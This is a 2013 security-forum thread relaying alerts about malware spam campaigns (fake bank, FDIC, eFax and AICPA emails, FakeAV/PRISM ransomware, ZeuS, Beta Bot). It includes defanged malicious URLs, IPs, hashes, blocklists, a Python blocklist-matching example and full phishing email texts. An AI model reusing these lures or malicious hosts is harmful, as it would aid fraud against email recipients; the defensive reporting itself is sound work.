Fake AV and PRISM warning on hijacked website
- http://research.zscaler.com/2013/09/fake-av-and-prism-warning-on-hijacked.html
Sep 9, 2013 - "While many individuals are concerned about privacy in light of PRISM, some malicious actors are using the program to scare naive users into installing ransomware. Since August 23rd, we have seen about 20 domains that carry FakeAV and Ransomware. These websites seem to have been hijacked. They are all hosting the malicious content over port 972 and use similar URL patterns. Here are a couple of examples:
kringpad.websiteanddomainauctions .com:972/lesser-assess_away-van.txt?e=20
miesurheilijaaantidiabetic.conferencesiq .com:972/realism_relinquish-umbrella-gasp.txt?e=21
squamipi.worldcupbasketball .net:972/duty_therefore.txt?e=21
The malicious files seem to be changing. It started with the classic FakeAV, then switched to a fake PRISM warning. In both cases, the goal is to scare the target into paying the attacker to "fix" their computer... FakeAV remains a popular technique to lure targets into paying attackers...
- FakeAV scan of the computer
> https://lh3.ggpht.com/-XH8fcTYMAPQ/Uio9HCB6IfI/AAAAAAAAsyI/batvgm9HvrA/s1600/fakeav-2103-1.jpeg
- FakeAV claims to have found threats
> https://lh3.ggpht.com/-4jJX3X52nRw/Uio9QYzv6JI/AAAAAAAAsyQ/_7SEkFXS0gw/s1600/fakeav-2013-2.jpeg
The scan claims to have found 18 threats. Two have been cured, but the victim must -pay- to get the remaining 16 threats taken care of...
PRISM warning... The attacker uses the recent news about PRISM to claim that the victim's computer has been blocked because it accessed illegal pornographic content. The victim has to pay $300 through MoneyPak, a prepaid card service...
- No less than 5 federal agencies are "blocking" your computer!
> https://lh3.ggpht.com/-_QJ4pSmyYqw/UipBeh9bnLI/AAAAAAAAsyo/oiQcSHvEc3o/s320/prism-1.jpeg
- Victim needs to pay up $300 to get his computer back.
> https://lh3.ggpht.com/-C4h73XCNJLM/UipB1WzBmZI/AAAAAAAAsyw/ZnFGY7A9BUs/s1600/prism-2.jpeg
Both malware connect to the same couple of IP addresses over ports 80 and 443 that include:
37.139.53.199
64.120.167.162
64.191.122.10
I expect attackers to take advantage of the upcoming UK laws on accessing adult content online to send new types of fake warnings to UK victims."

:fear: :mad::mad:

AplusWebMaster
2013-09-16, 18:47
FYI...

Fake Walls Fargo SPAM / WellsFargo - Important Documents.zip
- http://blog.dynamoo.com/2013/09/walls-fargo-spam-wellsfargo-important.html
16 Sep 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Mon, 16 Sep 2013 09:26:51 -0500 [10:26:51 EDT]
From: Harrison_Walsh @ wellsfargo .com
Subject: IMPORTANT Documents - WellsFargo
Please review attached documents.
Harrison_Walsh
Wells Fargo Advisors
817-674-9414 office
817-593-0721 cell Harrison_Walsh @wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

Attached is a ZIP file called WellsFargo - Important Documents.zip which in turn contains a malicious executable WellsFargo - Important Documents.exe which has a very low VirusTotal rate of 2/47*. Automated analysis tools... detect network traffic to [donotclick]www .c3dsolutions .com hosted on 173.229.1.89 (5Nines LLC, US). At present I do not have any evidence of further malware sites on that server."
* https://www.virustotal.com/en/file/d4b16269c9849c33a7bb2fdc782173a00e99db12a585689618dde3f4c6fcb101/analysis/1379342203/
___

ZeuS/ZBOT: Most Distributed malware by Spam in August
- http://blog.trendmicro.com/trendlabs-security-intelligence/zeuszbot-most-distributed-malware-by-spam-in-august/
Sep 16, 2013 - "... resurgence of online banking malware, in particular the increase of ZeuS/ZBOT variants during the quarter. While ZeuS/ZBOT has been around for some time, its prevalence shows that it is still a big threat to end users today. For the month of August, 23% of spam with malicious attachments were found carrying ZeuS/ZBOT variants, while 19% served FAREIT variants. ZeuS/ZBOT variants also had the distinction of being the most distributed malware by IPs related to spam botnets. It is also associated with various worm families that can spread itself or other malware families via email. A system infected with ZeuS/ZBOT may be infected with about five other worm variants like WORM_MYDOOM, WORM_VB, and WORM_BAGLE...
Malware families spread by spam
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Zeus-spam-percentage.jpg
... the majority of spam carrying either ZeuS/ZBOT or FAREIT looked more like legitimate messages, and were likely to supposedly come from well-known brands or companies.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/09/Spoofed-email-fareit-254x300.jpg
Once installed, Zeus/ZBOT variants are known to monitor users’ browsing behavior pertaining to visits to specific online banking sites. If users visit these sites and try to log in using their credentials, the malware injects additional fields for users to fill out and then steals this information. Cybercriminals can then use this stolen data to either initiate unauthorized transactions or sell it in the underground market. FAREIT is another data-stealing malware that gathers emails and FTP login credentials. This malware can also download other malware variants, including Zeus/ZBOT..."
___

Fake eFax SPAM / rockims .com
- http://blog.dynamoo.com/2013/09/efax-spam-rockimscom.html
16 Sep 2013 - "This fake eFax spam leads to malware on rockims .com:
Date: Mon, 16 Sep 2013 22:43:06 +0400 [14:43:06 EDT]
From: eFax Corporate [message@ inbound .efax .com]
Subject: Corporate eFax message - 1 pages
Warning: This message may not be from whom it claims to be. Beware of following any links in it or of providing the sender with any personal information.
Fax Message [Caller-ID: 854-349-9584]
You have received a 1 pages fax at 2013-16-09 01:11:11 CST.
* The reference number for this fax is latf1_did11-1237910785-2497583013-24.
View this fax using your PDF reader.
Click here to view this message ...
Thank you for using the eFax service! ...

Screenshot: https://lh3.ggpht.com/-g0-MrOF8Xvw/UjdWvoTurOI/AAAAAAAAB84/BQAkE0cb-dM/s1600/efax.png

The link in the email goes through a legitimate hacked site and then runs one of the following three scripts:
[donotclick]die-web-familie.homepage.t-online .de/quasar/monte.js
[donotclick]dim-kalogeras-ka-lar.schools .ac .cy/initials/casanovas.js
[donotclick]ade-data .com/exuded/midyear.js
These then lead to a malware payload at [donotclick]rockims .com/topic/seconds-exist-foot.php which is a -hijacked- GoDaddy domain hosted on 192.81.133.143 (Linode, US) along with quite a few other hijacked domains...
Recommended blocklist:
192.81.133.143 ..."
(More URLs listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/192.81.133.143/information/

:mad::fear:

AplusWebMaster
2013-09-17, 17:15
FYI...

Amazon Gift Card -phish- ...
- http://www.threattracksecurity.com/it-blog/50-amazon-gift-card-phish-makes-use-of-data-uri-technique/
Sep 17, 2013 - "Be wary of emails landing in mailboxes claiming to offer up “complimentary £50 gift cards” from Amazon. The mails, which claim to come from redeemATamazon(dot)co(dot)uk...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/amazonfakemail1.jpg
The mails are nice and professional looking, and the only real giveaway is that hovering over the “Redeem gift card” button displays a Tinyurl link -instead- of the expected Amazon URL... Clicking the Tinyurl link takes end-users to a very nice looking set of pages designed to offer up the so-called gift card, then extract personal information including cc number and name / address / dob... Once end-users have selected their card design, they’re suddenly informed that “Our constant security review has shown us that your account has been inactive. Please confirm your updated card information below. Once your details have been confirmed with our system, we will then post your free gift card to you” …along with a message that their card has expired and a billing information update is required... The concept of using this in a phish attack has been around for a while, but it isn’t too often you come across them... Amazon themselves list a lot of scam types on their Security & Privacy page* so you may want to familiarise yourselves with those. As always, if it sounds too good to be true then it probably is..."
* http://www.amazon.co.uk/gp/help/customer/display.html/ref=help_search_1-1?ie=UTF8&nodeId=492866&qid=1370954895&sr=1-1
___

Fake ADP SPAM / ADP_831290760091.zip
- http://blog.dynamoo.com/2013/09/adp-spam-adp831290760091zip.html
17 Sep 2013 - "This fake ADP spam has a malicious attachment:
Date: Tue, 17 Sep 2013 20:32:04 +0530 [11:02:04 EDT]
From: ADP ClientServices
Subject: ADP - Reference #831290760091
Priority: High Priority 1 (High)
We were unable to process your recent transaction. Please verify your details and try again.
If the problem persists, contact us to complete your order.
Transaction details are shown in the attached file.
Reference #831290760091
This e-mail has been sent from an automated system.
PLEASE DO NOT REPLY...

Attached to the email is a file called ADP_831290760091.zip which in turn contains ADP_Reference_09172013.exe which has a VirusTotal detection rate of 9/48*. Automated analysis [1] [2] [3] shows a connection attempt to awcoomer .com on 78.157.201.219 (UK Dedicated Servers Ltd, UK). I don't have any evidence of further infections on this server; it does host 30+ legitimate UK sites if that helps..."
* https://www.virustotal.com/en-gb/file/333342d7e7790daee364f7da003a8c690550df12647ccb72a022bd70bf2285ae/analysis/1379432239/

1) https://malwr.com/analysis/MDM2MmVmYThiMzAwNGE4OGIyOTlmZjEyODIzZjE5YTI/

2) http://camas.comodo.com/cgi-bin/submit?file=333342d7e7790daee364f7da003a8c690550df12647ccb72a022bd70bf2285ae

3) http://anubis.iseclab.org/?action=result&task_id=118929c3bd33d5cf4558fb39a8199c677&format=html
___

FedEx spam FAIL
- http://blog.dynamoo.com/2013/09/fedex-spam-fail.html
17 Sep 2013 - "This fake FedEx spam is presumably -meant- to have a malicious payload:
Date: Tue, 17 Sep 2013 13:02:25 +0000 [09:02:25 EDT]
From: webteam@ virginmedia .com
Subject: Your Rewards Order Has Shipped
This is to confirm that one or more items in your order has been shipped. Note that multiple items in an order may be shipped separately.
You can review complete details of your order on the Order History page
Thanks for choosing FedEx.
Order Confirmation Number: 0410493
Order Date: 09/15/2013
Redemption Item Quantity Tracking Number
Paper, Document 16 <
fedex.com Follow FedEx:
You may receive separate e-mails with tracking information for reward ordered...

Screenshot: https://lh3.ggpht.com/--53hJkHQbuU/Ujh2GyxXzbI/AAAAAAAAB9Q/8HFvlXVNoHM/s1600/fedex.png

Presumably there is meant to be a malicious link or attachment, but there isn't. However, the bad guys will probably use the same template again with a WORKING payload, so please take care."
___

FDIC Spam
- http://threattrack.tumblr.com/post/61500209698/fdic-spam
Sep 17, 2013 - "Subjects Seen:
FDIC: About your business account
FDIC: Your business account
Typical e-mail details:
Dear Business Customer,
We have important information about your bank.
Please View to view detailed information.
This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership

Malicious URLs
data.texosn .ru/insurance.problem.html
no-mice .ru/insurance.problem.html
fdic.gov.horse-mails .net/news/fdic-insurance.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/67c51721046f2bb32a14ba2919e3a939/tumblr_inline_mt9y7xPKjB1r6pupn.png

- http://blog.dynamoo.com/2013/09/fdic-spam-horse-mailsnet.html
17 Sep 2013 - "This fake FDIC spam leads to malware on www .fdic.gov.horse-mails .net:
Date: Tue, 17 Sep 2013 15:28:52 +0330 [07:58:52 EDT]
From: insurance.coverage@ fdic .gov
Subject: FDIC: About your business account
Dear Business Customer,
We have important news regarding your financial institution.
Please View to see further details.
This includes information on the acquiring bank (if applicable), how your accounts and loans are affected, and how vendors can file claims against the receivership
FDÌC Questions for FDÌC?
Contact Us...
Federal Insurance Company · 3501 Fairfax Drive · Arlington VA 22225 ...

Screenshot: https://lh3.ggpht.com/-YGld7C9xZtw/Ujh69VMQLsI/AAAAAAAAB9g/15BqbI3D7QM/s1600/fdic.png

The link goes through a legitimate -hacked- site and onto a malware landing page at [donotclick]www.fdic.gov.horse-mails .net/news/fdic-insurance.php which belongs to the Amerika gang and is hosted on the following IPs...:
37.221.163.174 (Voxility S.R.L., Romania)
95.111.32.249 (Megalan / Mobiltel EAD, Bulgaria)
109.71.136.140 (OpWan SARL, France)
174.142.186.89 (iWeb Technologies, Canada)
216.218.208.55 (Hurricane Electric, US) ...
new feature (pictured below)
> https://lh3.ggpht.com/-IXC9yHDKq48/Ujh85gQNIRI/AAAAAAAAB9s/nryohN6ihzQ/s1600/os-detection.png
Recommended blocklist...:
37.221.163.174
95.111.32.249
109.71.136.140
174.142.186.89
216.218.208.55 ..."

:fear: :mad:

AplusWebMaster
2013-09-21, 15:50
FYI...

Ajax Oracle Quotation Spam
- http://threattrack.tumblr.com/post/61803135323/ajax-oracle-quotation-spam
Sep 20, 2013 - "Subjects Seen:
my subject
Typical e-mail details:
Dear Sir/Madam
I am the Purchase Manager of AJAX ORACLE TRADING COMPANY LTD.We are a
major trading company located in Ontario Canada.
We are interested in purchasing your products as exactly shown in the DATA
SHEET as attached in this mail. Please check and get back to us as soon as
possible with your last price, payment terms and delivery time.
Your response will be highly appreciated.
Sincerely Yours.
Danny Davies
Sales Department
Ajax Oracle Trading Co.Ltd

Malicious File Name and MD5:
Quotation.zip (85E02878328919ABE4BB01FDEBD90E6)
Quotation.scr (3B56864260399FBB0259F817749E959C)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7365813051d152bf0f4f625b390fc6a2/tumblr_inline_mtg9dazzKD1r6pupn.png
___

WhatsApp "3 New Voicemail(s)" spam and 219.235.1.127
- http://blog.dynamoo.com/2013/09/whatsapp-3-new-voicemails-spam-and.html
20 September 2013 - "I am indebted to Gary Warner for his analysis* of this malware... This malware is particularly cunning...
> https://lh3.ggpht.com/-b6Aj4avuPQc/Ujy7tgfwSwI/AAAAAAAAB-Q/Q1ADawDWL6s/s1600/whatsapp.png
... it is possible that clicking the link installs the malware without asking on certain devices. The VirusTotal score for this .apk is a pretty health 21/48**, but who runs anti-virus software on their Android?... the application certainly seems to send traffic to 219.235.1.127 (Shanghai QianWan Network, China) which is probably a darned good candidate for blocking (if you can). This IP has been spotted with PC-based fake AV programs before... Although mobile malware is getting more common, this is the first time that I have seen an attack like this. All smartphone and tablet users need to be aware of the very real risks of malware on thier devices and should take the appropriate steps to keep themselves safe."
(More detail at the dynamoo URL above.)
* http://garwarner.blogspot.com/2013/09/fake-av-malware-hits-android.html

** https://www.virustotal.com/en/file/1d5390ff7fa9e813d47e12a2137dc5f67df12212196e614ec9f72ba6bbb85535/analysis/1379711360/
___

Shylock Financial Malware Back and Targeting Two Dozen Major Banks
- https://atlas.arbor.net/briefs/index#-1822006250
Elevated Severity
September 20, 2013 21:24
The Shylock banking trojan malware, also known as Caphaw, is active and targeting at least twenty-four banking institutions.
Analysis: Shylock has "man in the browser" capabilities whereby it takes over the user's system during banking transactions to commit fraud. As the fraud comes from the authorized user from the authorized system, the deviceprint is no longer a useful indicator of malicious activity. Shylock is increasing in popularity and is now aimed at more targets. Previously, it had a smaller number of regional targets.
Source: http://threatpost.com/shylock-financial-malware-back-and-targeting-two-dozen-major-banks/102343
"... researchers provided the list of 24 banks being targeted..."
___

Beta Bot malware blocks users A/V ...
- http://www.ic3.gov/media/2013/130918.aspx
Sep 18, 2013 - "The FBI is aware of a new type of malware known as Beta Bot. Cyber criminals use Beta Bot to target financial institutions, e-commerce sites, online payment platforms, and social networking sites to steal sensitive data such as log-in credentials and financial information. Beta Bot blocks computer users’ access to security websites and disables anti-virus programs, leaving computers vulnerable to compromise. Beta Bot infection vectors include an illegitimate but official looking Microsoft Windows message box named “User Account Control” that requests a user’s permission to allow the “Windows Command Processor” to modify the user’s computer settings. If the user complies with the request, the hackers are able to exfiltrate data from the computer. Beta Bot is also spread via USB thumb drives or online via Skype, where it -redirects- the user to compromised websites...
> https://www.ic3.gov/images/130918.png
Although Beta Bot masquerades as the “User Account Control” message box, it is also able to perform modifications to a user’s computer. If the above pop-up message or a similar prompt appears on your computer and you did not request it or are not making modifications to your system’s configuration, do not authorize “Windows Command Processor” to make any changes.
Remediation strategies for Beta Bot infection include running a full system scan with up-to-date anti-virus software on the infected computer. If Beta Bot blocks access to security sites, download the latest anti-virus updates or a whole new anti-virus program onto an uninfected computer, save it to a USB drive and load and run it on the infected computer. It is advisable to subsequently re-format the USB drive to remove any traces of the malware."
- https://atlas.arbor.net/briefs/index#64584071
Title: FBI Warning Users About Beta Bot Malware
Published: Fri, 20 Sep 2013 21:24:05 +0000
The Beta Bot malware has caught the attention of the FBI, who have issued a warning bulletin.
___

Backdoor installed via Java 6 exploit...
- http://blog.trendmicro.com/trendlabs-security-intelligence/blypt-a-new-backdoor-family-installed-via-java-exploit/
Sep 20, 2013 - "... this backdoor is installed using Java exploits; either drive-by downloads or compromised web sites may be used to deliver these exploits to user systems. This affects unsupported Java 6 users, meaning they’re at -extreme- risk since no patch will be available. Our research shows that the servers behind these attacks are mainly centered in Romania and Turkey. Currently, this threat is primarily hitting users in the United States; however it seems that consumers (as opposed to businesses) are the most affected... we found a Java exploit that was used to spread this attack. This particular exploit, detected as JAVA_EXPLOYT.HI, can be used to run arbitrary code. It exploits a vulnerability, CVE-2013-1493*, that has been exploited since February 2013. It was patched in March... The installer attempts to connect to three servers every 3 seconds, until it successfully downloads the backdoor component. If it fails, it will retry up to 32 times before it gives up... it provides instant feedback on the status of the install by accessing a URL on the malicious server, which actually serves as a status report..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493 - 10.0 (HIGH)
Last revised: 08/22/2013

:mad: :fear:

AplusWebMaster
2013-09-23, 21:41
FYI...

Fake FDIC emails serve client-side exploits and malware ...
- http://www.webroot.com/blog/2013/09/23/spamvertised-fdic-business-account-themed-emails-server-client-side-exploits-malware/
Sep 23rd, 2013 - "Cybercriminals are mass mailing tens of thousands of malicious Federal Deposit Insurance Corporation (FDIC) themed emails, in an attempt to trick users into clicking on the client-side exploits serving and malware dropping URLs found in the bogus emails...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/09/FDIC_Email_Spam_Spam_Campaign_Spamvertised_Malware_Malicious_Software_Exploits_Social_Engineering.png
Sample redirection chain: hxxp ://stranniki-music .ru/insurance.problem.html (62.173.142.30) -> hxxp ://www.fdic .gov.horse-mails .net/news/fdic-insurance.php (174.142.186.89; 216.218.208.55; 109.71.136.140; 37.221.163.174; 95.111.32.249) Email: comicmotors@ writeme .com ... MD5 for a sample served client-side exploit: MD5: 92897ad0aff69dee36dc22140bf3d8a9*. Sample MD5 for the dropped malware: MD5: 7b6332de90e25a5b26f7c75910a22e0c**. Once executed, the sample phones back to... C&C servers..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b34459b573637cb5e6fc938f989a24d79d0b83e9cb3fac272e5f7ecaad90519a/analysis/
Detection ratio: 28/48
** https://www.virustotal.com/en/file/07e7008fe60355714115364ad774b553b92d3515c2a810c2299f394c39d5f652/analysis/
Detection ratio: 9/48
___

FBI Ransomware forcing child porn on infected computers
- http://www.webroot.com/blog/2013/09/23/threatvlog-episode-6-fbi-ransomware-forcing-child-porn-infected-computers/
Sep 23, 2013 - "... new, very malicious form of FBI Ransomware that forces the users of infected machines to look at illegal imagery, taking the scare tactics to the next level..."
Video 2:27: https://www.youtube.com/embed/FAoRSLvtkA4
___

LinkedIn Invitation Spam
- http://threattrack.tumblr.com/post/62068030698/linkedin-invitation-spam
Sep 23, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
<removed> wants to connect with you on LinkedIn.

Malicious URLs
67.215.196.13 /images/wp-gdt.php?x1MVGHILHO0IT6347
exitdaymonthyear .biz/closest/i9jfuhioejskveohnuojfir.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3f99bf146a26fce1803ff953fd9d26ab/tumblr_inline_mtl6hnaHBA1r6pupn.png

- https://www.virustotal.com/en/ip-address/67.215.196.13/information/

Tagged: Blackhole, Sirefef, LinkedIn

:mad: :fear:
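The FDIC posts above (dynamoo and Webroot) give the indicators in defanged form ("horse-mails .net", "hxxp ://", "[donotclick]"), which is safe to paste into a forum but not directly usable by a proxy or DNS filter. The following is an added example, not code from either blog: it refangs those indicators, builds an IP/domain blocklist, and checks constructed proxy log lines (the log format and the traffic are invented for the example) against it. Matching on the apex domain as well as the exact host is an assumption about how to treat the gang's throwaway domains, not something the posts state.

```python
import ipaddress
import re

# Indicators transcribed from the FDIC posts quoted above, kept in the
# defanged form the posts use. Illustrative only, not a complete blocklist.
DEFANGED_INDICATORS = [
    "[donotclick]www.fdic.gov.horse-mails .net/news/fdic-insurance.php",
    "hxxp ://stranniki-music .ru/insurance.problem.html",
    "data.texosn .ru/insurance.problem.html",
    "no-mice .ru/insurance.problem.html",
    "37.221.163.174",
    "95.111.32.249",
    "109.71.136.140",
    "174.142.186.89",
    "216.218.208.55",
]

# Constructed proxy log lines (timestamp, client, destination host, URL); not
# real traffic. Lines 2-4 retrace the redirection chain described in the posts.
SAMPLE_LOG = [
    "2013-09-17T15:30:01Z 10.0.0.12 www.example.com http://www.example.com/",
    "2013-09-17T15:30:05Z 10.0.0.12 stranniki-music.ru http://stranniki-music.ru/insurance.problem.html",
    "2013-09-17T15:30:06Z 10.0.0.12 www.fdic.gov.horse-mails.net http://www.fdic.gov.horse-mails.net/news/fdic-insurance.php",
    "2013-09-17T15:31:00Z 10.0.0.44 216.218.208.55 http://216.218.208.55/news/fdic-insurance.php",
    "2013-09-17T15:32:00Z 10.0.0.44 www.fdic.gov https://www.fdic.gov/",
]


def refang(indicator):
    """Turn a defanged indicator back into a bare lower-case host or IP."""
    s = indicator.strip()
    s = re.sub(r"^\[donotclick\]", "", s)
    s = re.sub(r"^hxxps?\s*:\s*//", "", s, flags=re.IGNORECASE)
    s = re.sub(r"^https?://", "", s, flags=re.IGNORECASE)
    s = s.replace(" .", ".").replace(". ", ".")   # "horse-mails .net" -> "horse-mails.net"
    s = s.split("/", 1)[0].split(":", 1)[0]       # drop any path or port
    return s.lower().rstrip(".")


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def apex(host):
    """Naive registrable-domain guess (last two labels). No public suffix
    list is consulted, so co.uk-style names would need special handling."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def build_blocklist(indicators):
    ips, domains = set(), set()
    for ind in indicators:
        host = refang(ind)
        if not host:
            continue
        if is_ip(host):
            ips.add(host)
        else:
            domains.add(host)
            domains.add(apex(host))   # also catch sibling hostnames under the same throwaway domain
    return ips, domains


def match_host(host, blocklist):
    """Return the blocklist entry the host matches, or None."""
    ips, domains = blocklist
    host = host.lower().rstrip(".")
    if host in ips:
        return host
    for d in sorted(domains, key=len, reverse=True):   # most specific entry first
        if host == d or host.endswith("." + d):
            return d
    return None


def scan_log(lines, blocklist):
    """Return (line number, destination host, matched entry) for every blocked destination."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 3:
            continue
        reason = match_host(fields[2], blocklist)
        if reason:
            hits.append((n, fields[2], reason))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, build_blocklist(DEFANGED_INDICATORS)):
        print("line %d: %s matched blocklist entry %s" % hit)
```

Suffix matching on the apex is what catches a sibling such as a later `news.` or `secure.` hostname under the same domain; the genuine www.fdic.gov is not matched because only the look-alike suffix `horse-mails.net` is on the list.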

AplusWebMaster
2013-09-24, 16:58
FYI...

Fake DivX plug-in leads to Malware ...
- http://www.threattracksecurity.com/it-blog/fake-divx-plug-leads-picture-popping-malware/
Sep 23, 2013 - "Fans of semi-humorous Internet videos be warned: there’s a batch of files doing the rounds which pretend to be image files acting as DivX plug-ins... Sites pushing the files will claim you have the wrong type of DivX Plugin installed, with a new one being required to view the content. The first port of call (now replaced by a page-full of Javascript which we’re taking a look at) is / was located at sjsinternational(dot)com/shirleen
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/fbdivx1.jpg
“DivX plug-in required!
You don’t have the plugin required to view the video
Save the video and run it locally”
A rogue file – which appears to have been compiled in Russia – will be offered up to the end-user, typically offering up filenames that suggest photographs of a lewd and / or salacious nature. The files come from a .ua URL... one of the oldest tricks in the book is being used here – all the files claim to be gifs, jpegs and tif files, when they are (of course) anything but. Elsewhere on the same domain, we have a page which claims “You need to download and execute the Facebook app to see it! It’s amazing!” with yet another file being offered up. This page is still active, and located at sjsinternational(dot)com/marguerite.html
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/09/fbdivx2.jpg
... various URLs serving up the Malware have been very busy... More often than not, “Run this file to see a picture” results in no pictures and lots of files (bad ones, at that). This one is at least a little bit unusual if only because the end-user receives a (not very impressive) “reward” at the end of the hoop jumping. However, that reward comes loaded with Malware and should be avoided at all costs, whether posing as image files, Facebook apps or anything else you care to mention."
___

Fake Wire Transfer SPAM / INTL_Wire_Report-09242013.zip
- http://blog.dynamoo.com/2013/09/international-wire-transfer-spam.html
24 Sep 2013 - "This fake wire transfer spam has a malicious attachment:
Date: Tue, 24 Sep 2013 10:54:32 -0700 [13:54:32 EDT]
From: Wells Fargo Event Messaging Admin [ofsrep.ceoemigw@ wellsfargo .com]
Subject: International Wire Transfer File Not Processed
We are unable to process your International Wire Transfer request due to insufficient funds in the identified account.
Review the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 09/24/2013 03:00 pm PT, the file may not be processed.
Please view the attached file for more details on this transaction.
Any email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557).
Event Message ID: S203-8767457
Date/Time Stamp: Tue, 24 Sep 2013 10:54:32 -0700 ...

Attached is a ZIP file called INTL_Wire_Report-09242013.zip which in turn contains a malicious executable INTL_Wire_Report-09242013.exe (note the date is encoded into the filename). The VirusTotal results show a so-so detection rate of 9/48*... network traffic to ta3online .org on 108.168.164.202 (Softlayer, US) which is some sort of compromised legitimate site. Blocking EXE-in-ZIP files at your network perimeter is absolutely the best way of avoiding malware attacks like this."
* https://www.virustotal.com/en/file/cb920789573b15518b19cc3b413ebe6f1dada6c8c15f841e51d9369b85e285a1/analysis/1380058931/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Wire Transfer Failure Notification Email Messages - 2013 Sep 24
Fake Payment Information Email Messages - 2013 Sep 24
Fake Unpaid Debt Invoice Email Messages - 2013 Sep 24
Email Messages with Malicious Attachments - 2013 Sep 24
Email Messages with Malicious Attachments - 2013 Sep 24
Fake Shipping Order Information Email Messages - 2013 Sep 24
Fake Picture Delivery Email Messages - 2013 Sep 24
Fake Account Payment Notification Email Messages - 2013 Sep 24
Fake Fax Document Delivery Email Messages - 2013 Sep 24
Fake Media File Sharing Email Messages - 2013 Sep 24
Fake Bank Payment Information Email Messages - 2013 Sep 24
Fake Package Delivery Failure Notification Email Messages - 2013 Sep 24
Malicious Personal Pictures Attachment Email Messages - 2013 Sep 24
(More detail and links at the cisco URL above.)

:mad: :fear::fear:

AplusWebMaster
2013-09-26, 00:52
FYI...

Fake Intuit SPAM / Invoice_3056472.zip
- http://blog.dynamoo.com/2013/09/intuit-spam-invoice3056472zip.html
25 Sep 2013 - "It's an email from a company I have no dealings with, with a ZIP file that contains an EXE file! What could possibly go wrong? Oh..
Date: Wed, 25 Sep 2013 09:37:48 -0600 [11:37:48 EDT]
From: Lewis Muller [Lewis.Muller @ intuit .com]
Subject: FW: Invoice 3056472
Your invoice is attached.
Sincerely,
Lewis Muller
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...

The attachment is Invoice_3056472.zip which in turn contains a malicious file Invoice_092513.exe which has a pretty low VirusTotal detection rate of just 4/48*... the usual sort of badness, including a call home to gidleybuilders .com on 78.157.201.219 (UK Dedicated Servers Ltd, UK) which we also saw being used in an attack last week**. Two compromised domains in a week seems a bit more than a coincidence... legitimate domains are also on that same server..."
* https://www.virustotal.com/en/file/ab746f564e12257dc839c64b4d04a78979a2039c134c18dff3b6f487eef88607/analysis/1380130529/

** http://blog.dynamoo.com/2013/09/adp-spam-adp831290760091zip.html
___

Fake Phish - FW: Invoice 8428502
- http://security.intuit.com/alert.php?a=87
9/25/2013 - "Here is a copy of the phishing email people are receiving. Be sure -not- to click any links in the email.

Please be advised that the attachment (Invoice_092513.exe) received with this email was removed in accordance with the Assante Virus policy. If you are aware of the contents of this attachment and you require it for business reasons please contact the IT Helpdesk (its@assante.com OR 888 955 8886). Please contact the sender if you are unsure of the contents or purpose for the attachment.
Your invoice is attached.
Sincerely,
Cliff Jeffers

This is the end of the -fake- email..."
___

Fake AICPA SPAM / children-bicycle .net
- http://blog.dynamoo.com/2013/09/aicpa-spam-children-bicyclenet.html
25 Sep 2013 - "This fake AICPA spam leads to malware on the domain children-bicycle .net:
From: Reggie Wilkins [blockp12@ clients.aicpa .net]
Date: 25 September 2013 15:03
Subject: Your accountant license can be cancelled.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having trouble reading this email? View it in your browser.
AICPA logo
Cancellation of Accountant status due to tax return fraud allegations
Valued accountant officer,
We have received a complaint about your recent participation in tax return infringement for one of your employers. According to AICPA Bylaw Subsection 730 your Certified Public Accountant license can be withdrawn in case of the occurrence of filing of a false or fraudulent tax return for your client or employer.
Please familiarize yourself with the notification below and provide your feedback to it within 14 days. The failure to do so within this term will result in cancellation of your CPA license.
Complaint.pdf
The American Institute of Certified Public Accountants...

Screenshot: https://lh3.ggpht.com/-bGGHCaxMLis/UkL6RAFRnFI/AAAAAAAAB_c/04BZbMByhJ8/s1600/aicpa.png

... The link in the email goes to a legitimate -hacked- site and then on to a malware payload at [donotclick]www.aicpa.org.children-bicycle .net/news/aicpa-all.php (report here*).. but only if the visitor is running Windows (more of which in a moment). The domain children-bicycle .net is registered with fake WHOIS details and the pattern of the domain marks it out as belonging to the Amerika gang... The payload is hosted on the following IP addresses (all also listed here**):
24.111.103.183 (Midcontinent Media, US)
109.71.136.140 (OpWan, France)
184.82.233.29 (Network Operations Center, US)
As I mentioned, the code detects the visitor's OS and only sends the victim to the exploit kit if they are running Windows, others end up at the genuine aicpa .org website:
> https://lh3.ggpht.com/-9WjcD-F-6Hk/UkL9_bvLrVI/AAAAAAAAB_o/5D0WOTEyMMU/s1600/aicpa-code.png
Recommended blocklist:
24.111.103.183
109.71.136.140
184.82.233.29 ..."
* http://urlquery.net/report.php?id=5941489

** http://blog.dynamoo.com/2013/09/malware-sites-to-block-2492013.html
___

6rf .net and something evil on 198.50.225.121, 85.25.108.10 and 178.33.208.211
- http://blog.dynamoo.com/2013/09/6rfnet-and-something-evil-on.html
